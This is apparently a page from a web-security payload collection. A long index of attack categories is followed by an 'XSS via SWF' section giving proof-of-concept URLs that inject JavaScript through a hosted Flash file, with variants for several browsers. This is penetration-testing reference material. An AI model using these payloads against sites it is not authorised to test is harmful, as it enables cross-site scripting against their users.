Skip to content

Payloads All The Things

Index

Payloads All The Things

Payloads All The Things [![Tweet](https://img.shields.io/twitter/url/http/shields.io.svg?style=social)](https://twitter.com/intent/tweet?text=Payloads%20All%20The%20Things,%20a%20list%20of%20useful%20payloads%20and%20bypasses%20for%20Web%20Application%20Security%20-%20by%20@pentest_swissky&url=https://github.com/swisskyrepo/PayloadsAllTheThings/)
Books
CONTRIBUTING
Twitter
Youtube
API Key Leaks
API Key Leaks
- API Key Leaks
AWS Amazon Bucket S3
AWS Amazon Bucket S3
- Amazon Bucket S3 AWS
Account Takeover
Account Takeover
- Account Takeover
CORS Misconfiguration
CORS Misconfiguration
- CORS Misconfiguration
CRLF Injection
CRLF Injection
- CRLF
CSRF Injection
CSRF Injection
- Cross-Site Request Forgery
CSV Injection
CSV Injection
- CSV Injection (Formula Injection)
CVE Exploits
CVE Exploits
- Common Vulnerabilities and Exposures
- CVE-2021-44228 Log4Shell
Command Injection
Command Injection
- Command Injection
DNS Rebinding
DNS Rebinding
- DNS Rebinding
Dependency Confusion
Dependency Confusion
- Dependency Confusion
Directory Traversal
Directory Traversal
- Directory traversal
File Inclusion
File Inclusion
- File Inclusion
GraphQL Injection
GraphQL Injection
- GraphQL injection
HTTP Parameter Pollution
HTTP Parameter Pollution
- HTTP Parameter Pollution
Insecure Deserialization
Insecure Deserialization
Insecure Direct Object References
Insecure Direct Object References
- Insecure Direct Object References
Insecure Management Interface
Insecure Management Interface
- Insecure management interface
Insecure Source Code Management
Insecure Source Code Management
- Insecure source code management
JSON Web Token
JSON Web Token
- JWT - JSON Web Token
Java RMI
Java RMI
- Java RMI
Kubernetes
Kubernetes
- Kubernetes
LDAP Injection
LDAP Injection
- LDAP injection
LaTeX Injection
LaTeX Injection
- LaTex Injection
Methodology and Resources
Methodology and Resources
NoSQL Injection
NoSQL Injection
- NoSQL injection
OAuth
OAuth
- OAuth
Open Redirect
Open Redirect
- Open URL Redirection
Race Condition
Race Condition
- Race Condition
Request Smuggling
Request Smuggling
- Request Smuggling
SAML Injection
SAML Injection
- SAML Injection
SQL Injection
SQL Injection
Server Side Request Forgery
Server Side Request Forgery
- Server-Side Request Forgery
Server Side Template Injection
Server Side Template Injection
- Templates Injections
Tabnabbing
Tabnabbing
- Tabnabbing
Type Juggling
Type Juggling
- PHP Juggling type and magic hashes
Upload Insecure Files
Upload Insecure Files
- Upload
- CVE Ffmpeg HLS
  CVE Ffmpeg HLS
  - FFmpeg HLS vulnerability
- Configuration Apache .htaccess
  Configuration Apache .htaccess
  - .htaccess upload
- Configuration Busybox httpd.conf
  Configuration Busybox httpd.conf
  - Index
- Extension Flash
  Extension Flash
  - Index Index
    Table of contents
    
    XSS via SWF
- Picture Image Magik
  Picture Image Magik
  - Image Tragik 1 & 2
- Zip Slip
  Zip Slip
  - Zip Slip
Web Cache Deception
Web Cache Deception
- Web Cache Deception Attack
Web Sockets
Web Sockets
- Web Sockets Attacks
XPATH Injection
XPATH Injection
- XPATH injection
XSLT Injection
XSLT Injection
- XSLT Injection
XSS Injection
XSS Injection
XXE Injection
XXE Injection
- XML External Entity
template vuln
template vuln
- Vulnerability Title

Index

XSS via SWF

As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs. This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either.

Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);

IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}

IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);

Last update: August 30, 2022